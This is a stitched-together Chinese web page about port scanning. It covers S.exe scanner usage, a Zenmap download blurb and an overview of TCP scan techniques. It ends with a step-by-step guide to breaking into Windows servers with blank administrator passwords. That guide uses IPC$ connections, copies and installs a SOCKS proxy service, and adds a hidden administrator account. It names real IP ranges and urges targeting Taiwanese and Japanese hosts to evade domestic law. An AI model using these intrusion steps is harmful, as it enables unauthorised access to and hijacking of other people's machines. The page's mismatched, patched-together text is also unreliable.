端口扫描工具怎么用_端口扫描工具简笔画素材

什么是端口扫描器?它有什么作用?

s 扫描器是一款命令行下高速扫描利器，通过最新的瑞星杀毒软件测试

命令: s.exe syn ip1 ip2 端口号 /save

s.exe tcp ip1 ip2 端口号 线程数 /save

s.exe扫描器的使用说明

首先我解释下什么是S扫描器，S扫描器是针对微软ms04045漏洞出的一个扫描，原来作者出这东西

的目的是为了扫描这个漏洞，但现在已经变成我们黑客手中的兵器了，大家也许看过很多如何找肉鸡的

动画或刷QB的动画，那些动画里面很多都是用S扫描器来扫描肉鸡或别人电脑所开放的端口及一些漏洞，

都用这工具的好处是它的扫描速度实在是一个字---强！ 今天我就来教下大家如何使用S扫描器。

简单说明下它的用处：

S扫描器是一个简单的使用两种常用的扫描方式进行端口扫描的端口扫描器程序.

可实现的功能是:

1.两种不同的扫描方式(SYN扫描和一般的connect扫描)

2.可以扫描单个IP或IP段所有端口

3.可以扫描单个IP或IP段单个端口

4.可以扫描单个IP或IP段用户定义的端口

5.可以显示打开端口的banner

6.可将结果写入文件

7.TCP扫描可自定义线程数

用法:scanner TCP/SYN StartIP [EndIP] Ports [Threads] [/Banner] [/Save]

参数说明:

TCP/SYN - TCP方式扫描或SYN方式扫描(SYN扫描需要在win 2k或以上系统才行),SYN扫描对本机无效

StartIP - 起始扫描的IP

EndIP - 结束扫描的IP,可选项,如果这一项没有，就只是对单个IP扫描

Ports - 可以是单个端口，连续的一段端口或非连续的端口

Threads - 使用最大线程数去扫描(SYN扫描不需要加这一项),不能超过1024线程

/Banner - 扫描端口时一并将Banner显示出来,这一选项只对TCP扫描有效

/Save - 将结果写入当前目录的Result.txt文件中去

打开S扫描器，下面我举几个例子演示下S扫描器的主要几个作用。

例子一:

S TCP 218.80.12.1 218.80.12.123 80 512

TCP扫描218.80.12.1到218.80.12.123这IP段中的80端口,最大并发线程是512

例子二：

S TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner

TCP扫描218.80.12.1到218.80.12.123这IP段中的21和5631端口,最大并发线程是512,并显示Banner

例子三：

S TCP 218.80.12.1 218.80.12.12 1-200 512

TCP扫描218.80.12.1到218.80.12.12这IP段中的1到200端口,最大并发线程是512

例子四：

S TCP 218.80.12.7 1-200 512

TCP扫描218.80.12.7这IP中的1到200端口,最大并发线程是512

例子五：

S SYN 218.80.12.7 1-65535 /Save

SYN扫描218.80.12.7这IP中的1到65535端口,将结果写入Result.txt

扫描结束后Result.txt就存放在你的S扫描器所在的目录里。刚才扫描的东西都在里面。

例子六：

S SYN 218.80.12.1 218.80.12.255 21 /Save

SYN扫描218.80.12.1到218.80.12.255这IP段中的21端口,将结果写入Result.txt

这个我重点说明一下，因为这条命令就是专门用来找肉鸡的，扫描一个IP段有没有开3389的或1433的

我示范下：S SYN 218.80.1.1 218.80.255.255 3389 /Save

注意:

1.SYN扫描是很依赖于扫描者和被扫描者的网速的,如果你是内网的系统，那你不一定可以使用SYN扫描的

，因为你的网关的类型会决定内网系统是否能进行SYN扫描.如果你的配置较低的话，我也不推荐使用

SYN扫描.SYN扫描速度是比TCP扫描的速度快很多的，但在稳定性方面却不是太好，所以自己决定使用

哪种模式进行扫描。

2.SYN扫描不需要线程那个参数，请看上面例子5和6

3.TCP扫描的最大并发线程不能超过1024.

4.使用SYN模式扫描，不能扫描Banner,具体为什么不能，请查看有关SYN的资料

5.内网用户的朋友可以用tcp扫描

关于S.exe 的用法和错误解释

S扫描器扫描命令是:

文件名 参数 起始IP 结束IP 要扫描的端口 保存

s SYN 61.0.0.0 61.255.255.255 1433 save

1433是SQL server 服务器端口

8080是代理服务器端口

哪位大神有Zenmap(端口漏洞扫描工具) V7.92 绿色中文版软件百度云资源

链接:

提取码:k7y8

软件名称:Zenmap(端口漏洞扫描工具)V7.92绿色中文版

语言:简体中文

大小:27.30MB

类别:系统工具

介绍:Zenmap绿色中文版是一款优秀的端口漏洞扫描工具，Zenmap能够帮助用户检查主机上的端口情况，并且Zenmap可以检测相应的端口的软件，而且Zenmap操控的方法非常简单，有需要的朋友快来下载吧。

端口扫描原理及工具 - 安全工具篇

"端口"是英文port的意译，可以认为是设备与外界通讯交流的出口。端口可分为虚拟端口和物理端口，其中虚拟端口指计算机内部端口，不可见。例如计算机中的80端口、21端口、23端口等。

一台拥有IP地址的主机可以提供许多服务，比如Web服务、FTP服务、SMTP服务等，这些服务完全可以通过1个IP地址来实现。那么，主机是怎样区分不同的网络服务呢？显然不能只靠IP地址，因为IP 地址与网络服务的关系是一对多的关系。实际上是通过“IP地址+端口号”来区分不同的服务的。

因此，一个开放的端口代表一个提供的服务，不同的服务具有不同的端口号， 因此要对服务进行测试，首先要确定是否开放对应端口号 。

TCP端口和UDP端口。由于TCP和UDP 两个协议是独立的，因此各自的端口号也相互独立，比如TCP有235端口，UDP也 可以有235端口，两者并不冲突。

1、周知端口

周知端口是众所周知的端口号，范围从0到1023，其中80端口分配给WWW服务，21端口分配给FTP服务等。我们在IE的地址栏里输入一个网址的时候是不必指定端口号的，因为在默认情况下WWW服务的端口是“80”。

2、动态端口

动态端口的范围是从49152到65535。之所以称为动态端口，是因为它 一般不固定分配某种服务，而是动态分配。

3、注册端口

端口1024到49151，分配给用户进程或应用程序。这些进程主要是用户安装的程序。

1、使用Nmap工具查找ip的tcp端口

-O ：获取操作系统版本信息

2、使用Nmap工具查找udp端口

-sU ：表示udp scan ， udp端口扫描

-Pn ：不对目标进行ping探测（不判断主机是否在线）（直接扫描端口）

对于udp端口扫描比较慢，扫描完6万多个端口需要20分钟左右

3、使用Nmap工具获取端口Banner

只会返回有Banner信息的，没有则不会返回。

4、使用Nmap嗅探服务版本信息

如果没有返回banner信息的，也可以使用该方法尝试嗅探服务版本信息。

5、利用nmap对目标进行完整测试

在针对内容测试时，有授权的情况下，可以利用nmap对目标进行完整测试

Python 实现端口扫描

一、常见端口扫描的原理

0、秘密扫描

秘密扫描是一种不被审计工具所检测的扫描技术。

它通常用于在通过普通的防火墙或路由器的筛选（filtering）时隐藏自己。

秘密扫描能躲避IDS、防火墙、包过滤器和日志审计，从而获取目标端口的开放或关闭的信息。由于没有包含TCP 3次握手协议的任何部分，所以无法被记录下来，比半连接扫描更为隐蔽。

但是这种扫描的缺点是扫描结果的不可靠性会增加，而且扫描主机也需要自己构造IP包。现有的秘密扫描有TCP FIN扫描、TCP ACK扫描、NULL扫描、XMAS扫描和SYN/ACK扫描等。

1、Connect()扫描

此扫描试图与每一个TCP端口进行“三次握手”通信。如果能够成功建立接连，则证明端口开发，否则为关闭。准确度很高，但是最容易被防火墙和IDS检测到，并且在目标主机的日志中会记录大量的连接请求以及错误信息。

TCP connect端口扫描服务端与客户端建立连接成功（目标端口开放）的过程：

① Client端发送SYN；

② Server端返回SYN/ACK，表明端口开放；

③ Client端返回ACK，表明连接已建立；

④ Client端主动断开连接。

建立连接成功（目标端口开放）

TCP connect端口扫描服务端与客户端未建立连接成功（目标端口关闭）过程：

① Client端发送SYN；

② Server端返回RST/ACK，表明端口未开放。

优点：实现简单，对操作者的权限没有严格要求（有些类型的端口扫描需要操作者具有root权限），系统中的任何用户都有权力使用这个调用，而且如果想要得到从目标端口返回banners信息，也只能采用这一方法。

另一优点是扫描速度快。如果对每个目标端口以线性的方式，使用单独的connect()调用，可以通过同时打开多个套接字，从而加速扫描。

缺点：是会在目标主机的日志记录中留下痕迹，易被发现，并且数据包会被过滤掉。目标主机的logs文件会显示一连串的连接和连接出错的服务信息，并且能很快地使它关闭。

2、SYN扫描

扫描器向目标主机的一个端口发送请求连接的SYN包，扫描器在收到SYN/ACK后，不是发送的ACK应答而是发送RST包请求断开连接。这样，三次握手就没有完成，无法建立正常的TCP连接，因此，这次扫描就不会被记录到系统日志中。这种扫描技术一般不会在目标主机上留下扫描痕迹。但是，这种扫描需要有root权限。

·端口开放：（1）Client发送SYN；（2）Server端发送SYN/ACK；（3）Client发送RST断开（只需要前两步就可以判断端口开放）

·端口关闭：（1）Client发送SYN；（2）Server端回复RST（表示端口关闭）

优点：SYN扫描要比TCP Connect()扫描隐蔽一些，SYN仅仅需要发送初始的SYN数据包给目标主机，如果端口开放，则相应SYN-ACK数据包；如果关闭，则响应RST数据包；

3、NULL扫描

反向扫描—-原理是将一个没有设置任何标志位的数据包发送给TCP端口，在正常的通信中至少要设置一个标志位，根据FRC 793的要求，在端口关闭的情况下，若收到一个没有设置标志位的数据字段，那么主机应该舍弃这个分段，并发送一个RST数据包，否则不会响应发起扫描的客户端计算机。也就是说，如果TCP端口处于关闭则响应一个RST数据包，若处于开放则无相应。但是应该知道理由NULL扫描要求所有的主机都符合RFC 793规定，但是windows系统主机不遵从RFC 793标准，且只要收到没有设置任何标志位的数据包时，不管端口是处于开放还是关闭都响应一个RST数据包。但是基于Unix(*nix,如Linux)遵从RFC 793标准，所以可以用NULL扫描。 经过上面的分析，我们知道NULL可以辨别某台主机运行的操作系统是什么操作系统。

端口开放：Client发送Null，server没有响应

端口关闭：（1）Client发送NUll；（2）Server回复RST

说明：Null扫描和前面的TCP Connect（）和SYN的判断条件正好相反。在前两种扫描中，有响应数据包的表示端口开放，但在NUll扫描中，收到响应数据包表示端口关闭。反向扫描比前两种隐蔽性高些，当精确度也相对低一些。

用途：判断是否为Windows系统还是Linux。

4、FIN扫描

与NULL有点类似，只是FIN为指示TCP会话结束，在FIN扫描中一个设置了FIN位的数据包被发送后，若响应RST数据包，则表示端口关闭，没有响应则表示开放。此类扫描同样不能准确判断windows系统上端口开发情况。

·端口开放：发送FIN，没有响应

·端口关闭：（1）发送FIN；（2）回复RST

5、ACK扫描

扫描主机向目标主机发送ACK数据包。根据返回的RST数据包有两种方法可以得到端口的信息。方法一是： 若返回的RST数据包的TTL值小于或等于64，则端口开放，反之端口关闭。

6、Xmas-Tree扫描

通过发送带有下列标志位的tcp数据包。

·URG：指示数据时紧急数据，应立即处理。

·PSH：强制将数据压入缓冲区。

·FIN：在结束TCP会话时使用。

正常情况下，三个标志位不能被同时设置，但在此种扫描中可以用来判断哪些端口关闭还是开放，与上面的反向扫描情况相同，依然不能判断windows平台上的端口。

·端口开放：发送URG/PSH/FIN，没有响应

·端口关闭：（1）发送URG/PSH/FIN，没有响应；（2）响应RST

XMAS扫描原理和NULL扫描的类似，将TCP数据包中的ACK、FIN、RST、SYN、URG、PSH标志位置1后发送给目标主机。在目标端口开放的情况下，目标主机将不返回任何信息。

7、Dump扫描

也被称为Idle扫描或反向扫描，在扫描主机时应用了第三方僵尸计算机扫描。由僵尸主机向目标主机发送SYN包。目标主机端口开发时回应SYN|ACK，关闭时返回RST，僵尸主机对SYN|ACK回应RST，对RST不做回应。从僵尸主机上进行扫描时，进行的是一个从本地计算机到僵尸主机的、连续的ping操作。查看僵尸主机返回的Echo响应的ID字段，能确定目标主机上哪些端口是开放的还是关闭的。

二、Python 代码实现

1、利用Python的Socket包中的connect方法，直接对目标IP和端口进行连接并且尝试返回结果，而无需自己构建SYN包。

2、对IP端口进行多线程扫描，注意的是不同的电脑不同的CPU每次最多创建的线程是不一样的，如果创建过多可能会报错，需要根据自己电脑情况修改每次扫描的个数或者将seelp的时间加长都可以。

看完了吗？感觉动手操作一下把！

python学习网，免费的在线学习python平台，欢迎关注！

本文转自：

端口扫描、跳板的详细教程！

特别提醒：千万不要做国内的主机啊！做日本或者阿扁（台湾）吧，这样既不违反 我们国家的法律，也体现了自己的爱国心，哈哈（摘录别人的话），不过最好还是老老实实的做跳板，不要总是去想着做什么坏事。 千万不要用国内的主机做试验啊，否则等着警车来接你啦 怎样制作代理跳板 说明：（1）这篇文章是我自己做跳板的一点体会，是些给那些从来没有做过跳板的网友看的。做过跳板的网友就不用看了。 （2）本文讲述的是做跳板最简单，最基础的方法，仅仅是给新手提供一个思路，一些稍微复杂的方法比如unicode，CGI等等这里不讲。 （3）做跳板毕竟算是一种入侵行为，有了跳板和肉鸡以后，千万要用在该用的地方，不要刻意去“黑“别人啊！！ 准备工作： 做一件事情，至少需要两个方面的准备工作：相关的基础知识和做这件事情的工具。 基本的工具：（1）x-scan v1.3：强大的漏洞扫描工具，对于初学者来说非常好的一个工具。我们主要用他来扫描一些基本的漏洞（主要是NT弱密码），用法在后面会具体说。（其实流光很不错的，但是我觉得流光再扫NT弱密码的时候太烦了） （2）superscan：非常快速的端口扫描工具，可以在很短的时间里发现某个IP域上IP的分布。为什么用他呢？主要是避免盲目扫描，提高效率：某个 IP域上IP地址的分布不是连续的，也许他从xxx.xxx.0.0-xxx.xxx.50.255上每个IP都是有计算机存在的，而从 xxx.xxx.51.0- xxx.xxx.100.255每个IP都没有计算机存在。如果你事先不知道这一段上根本没有主机的话，花了很长时间去扫描也不会有结果,浪费时间和金钱 啊。 （3）fluxay 4.0：大名鼎鼎的扫描工具，我们主要用它的NT管道命令功能来连接目标主机，以及添加用户、远程启动服务等。注意了：最好是fluxay 4.0版本。 （4）windows2000下的c:\命令提示符工具：也就是说，跳板的制作至少是要在windows2000以上的操作系统下进行。 （5）sksockserver.exe：做跳板的主角，就是用它来实现远程主机的socks5代理功能的。 （6）全球IP地址分配表：这个对于高手来说是不必要的，用他的目的是考虑到很多以前没有做过跳板的网友对IP的分布不了解，我们主要的目标还是国外的主 机，因此对国外的IP分布有一些了解是很重要的，也是以后我们选定所要扫描的IP域的主要根据。这样的话，就省得再去用“追捕”软件查找IP的实际所在地 了。 好了工具准备完了，现在了解一下做跳板的大概过程。 注意：刚才你下载的这些东东不是放在你的硬盘上！放在什么地方呢？放在“肉鸡”上！ 就是说我们做跳板的过程是在肉鸡上完成的。 名词解释肉鸡：肉鸡是开了3389端口微软终端服务（microsoft terminal service），又有弱密码的高速服务器，俗称“肉鸡”。我们之所以要在肉鸡上做，是出于安全考虑，因为做跳板毕竟是一种非法入侵行为，我们需要隐藏自 己的踪迹，当然，不想用肉鸡也可以，前提是你有足够的带宽，而且不怕公安上门找你麻烦。（当然，进入肉鸡本身也是一种非法的入侵）。我们用 mstsc.exe这个软件登陆上肉鸡，就可以像平时我们在自己电脑上一样用鼠标控制远程的服务器（也就是肉鸡）做我们要做的事情。 过程：为了叙述的方便，先假设我们已经有了一个肉鸡。下面的步骤没有特殊说明都是在“肉 鸡”上完成的。 （1） 先在自己的机器上打开全球IP地址分配表，选取一个IP区域 （2） 登陆上肉鸡，把刚才说到的工具在肉鸡上下载好，就用肉鸡自己的IE下载就行了。 （3） 主要的过程是：先用superscan扫描（1）选定的IP区域，找到其中一个IP很集中的区域，然后放到x-scan进行漏洞扫描（因为是面对以前没有 做过跳板的网友，所以这里只介绍用NT弱密码制作跳板），找到若干个有弱密码的IP，把sksockserver.exe上传到目标主机上，然后远程启动 sksockserver。这样，跳板就做好了。 我们一起来实践一下，做一个跳板： （1） 刚才说过了，没有肉鸡做跳板是不行的，尤其是拨号上网的网友（速度慢）。我们首先登陆上一个已经知道的肉鸡：xxx.xxx.xxx.xxx。帮刚才上面 提到的东东都准备好。最好是集中放置，这样便于我们使用。不要到处乱放，否则主人一进来就知道有人进过他的机器。 （2） 我们选择210.85.0.0-210.85.50.255这一段IP（台湾），放在superscan里面去，把superscan的端口设置改成只有 80一个端口，然后确定，开始扫描。这时，在下面的输出框里面，就会出现一大批的活跃IP，看见了吗？210.85.0.0-210.85.40.255 这一段上都是活跃的IP。现在我们随便选一个IP区域，比如我们就选210.85.0.0-210.85.5.255这一段，不要太长，因为下一步我们要 把他们放进x-scan进行扫描，x-scan扫描速度并不是很快，太多的话，会降低效率，而且IP区域过长的话，有可能使x-scan出现误报。 x-scan的使用方法这里就不详细叙述了这里要做的就是：在“设置”菜单里，先选“扫描模块”，选择“开放端口”和“NT弱密码”两个选项，在“扫描参 数”里，填上我们刚才选定的IP范围：210.85.0.0-210.85.5.255，接着，在其中“端口相关设置”里，把原先一长串的端口去掉，只填 上80，3389两个端口，其他的设置就用默认的好了，不用再改了。然后就开始搜索，这需要大概你8、9分钟的时间（因为x-scan虽然简单，但是速度慢），这段时间你大可以做一点自己的其他事情，等时间差不多了，你再看看x-scan里面的结果：好的，N个机器的密码为空，这下子有收获了！但是要说的 是，x-scan有一些误报，大家一定要有耐心去试啊！ （3） 我们随便从中间随便选了一个，比如：210.85.0.14：administrator 空。接下来的事情， 是要验证它到底接不接受我们的连接，密码是不是正确。现在用到流光了，打开流光，选择“工具”里面的“ＮＴ管道远程命令”，出现对话框，把刚才的ＩＰ，用户名，密码填进去，然后回车。在界面上“ＮＴＣＭＤ”提示符后面打入ＣＭＤ，连接成功，屏幕上出现了“Ｃ：\ＷＩＮＮＴ\ ＳＹＳＴＥＭ３２”的提示符。这证明，刚才的用户名和密码是正确的，这台机器已经基本是你的了。好了，我们进去了，想想我们要做什么呢？对了，是做跳板，我们还要把sksockserver.exe放到210.85.0.14上，这样才能启动服务，让这台机器做为跳板！怎么把这个东东放上去呢： 调出肉鸡上的ＣＭＤ，在命令提示符下按下面的方法做： c:\net use \\210.85.0.14\ipc$ “”/user:“administrator”（建立IPC连接） 系统提示：命令成功完成。 Copy c:\sksockserver.exe \\210.85.0.14\admin$ 系统提示：成功复制一个文件。 这样我们就成功地把sksockserver.exe传到了目标主机上。接下来的任务就是把他远程启动就行了。 我们又回到刚才流光的NTCMD里，在提示符下按下面的方法做： c:\sksockserver –install 系统提示：snake sockproxy service installed c:\sksockserver –config port 1949（端口自己来定，这里的1949是随便选的） 系统提示：the port value have set to 1949 c:\sksockserver –config starttype 2 系统提示：the starttype have set to 2---auto c:\net start skserver 系统提示服务启动成功。 这个时候，这台机器已经成为你的跳板了。 下面简单的说一说自己找肉鸡的方法。 工具：（1）sockscap：强大的socks代理调度软件。 （2）snake的代理跳板GUI（图形界面程序） （3）mstsc：微软terminal service终端服务的客户端程序。用于登陆3389肉 鸡。有了它，我们就可以象控制自己的机器一样控制终端服务器，做我们的事情了。 其实前面两个都是附属的工具，只有mstsc才是真正唱主角的。 Sockscap和sksockserver GUI配合实现实现跳板的使用，可以隐藏我们的 入侵痕迹。 我们现在还没有肉鸡，那么一切事情都只能在我们自己的机器上做了，如果你不放心的话 可以到网吧去做下面的事情。 但是，要提醒的是，千万不要做国内的主机啊！做日本或者阿扁（台湾）吧，这样既不违反 我们国家的法律，也体现了自己的爱国心，哈哈（摘录别人的话），不过最好还是老老实实 的做跳板，不要总是去想着做什么坏事。 步骤其实跟做跳板也很相似的。刚才我们在x-scan搜索的端口里设置了3389，如果一台机 器开了3389端口，而且有了弱密码的话，那这样的机器就是所谓的“肉鸡”了。（当然输入 法漏洞有的时候也可以做成肉鸡，但是毕竟现在有输入法漏洞的机器太少了，远远不及有弱 密码的终端服务器那么多，所以我们还是选择了后者，而且输入法漏洞只适合国内机器。一 个一个去试验，真是太浪费时间了！会烦死的。） 具体搜索过程跟刚才在作跳板里是一样的，找到一个开了3389端口服务，而且有弱密码的 机器。我们在上面搜索的结果中仔细地看看，终于发现了一台：210.85.2.84:frank41:空。而 且开了3389服务。要把这台机器变成自己地机器那肯定要有自己的登录名，否则每次总是 用别人的，那还怎么叫是自己的机器？我们现在来为自己添加一个用户名，把自己提升成为 root权限，那么我们就可以做任何事情了。打开流光，选择“工具”里面的“NT管道命令” 填上刚才得到的用户名跟密码：frank41：空。然后确定，进入NTCMD界面，在提示符下 键入:CMD,连接成功以后在系统提示符下如下操作： c:\net user admin /add（添加一个admin用户） c:\net user admin shonline788（使得admin的密码是shonline788） c:\net localgroup administrators admin /add（把用户admin提升为administrator即管理员身份） 这样我们就成功的在这台机器中取得了root权限，可以作任何事情了，但是别做坏事噢。 下一步，就要用上我们刚才准备的这些工具了。在网上搞几个socks代理，把sockscap和 sksockserverGUI设置好，把mstsc的图标拖到sockscap里去，双击mstsc的图标，在其中填 上你刚才找到的肉鸡IP：210.85.2.84,然后回车进行连接。成功以后，会出现一个跟我们平 时登陆windows2000时候一样的一个蓝色的界面，在里面填上我们刚才添加的用户名和密 码，回车登陆。登陆成功以后就会出现该主机的图形界面，这个时候你就可以象操作自己的 机器一样，操作别人的机器。至此，你已经获得了一台肉鸡。就可以做我们上面做过的事情 了。